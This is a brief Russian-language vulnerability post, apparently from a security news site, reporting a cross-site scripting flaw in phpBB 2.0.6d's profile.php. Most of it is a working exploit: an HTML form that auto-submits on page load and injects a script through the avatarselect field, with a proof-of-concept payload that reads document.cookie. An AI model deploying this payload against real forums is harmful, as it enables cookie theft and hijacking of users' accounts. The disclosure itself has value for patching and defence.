Программа: phpBB 2.06d 

Уязвимость обнаружена в phpBB в ‘profile.php’. Удаленный пользователь может выполнить XSS нападение. 

Эксплоит: 

<form name=’f’ action=»http://site/profile.php?mode=editprofile» method=»post»>
<input name=»avatarselect» value='» ><script>alert(document.cook
ie)</script>’>
<input type=»submit» name=»submitavatar» value=»Select avatar»>
</form>
<script>
window.onload=function()
{
document.all.submitavatar.click();
}
</script>

Оставить мнение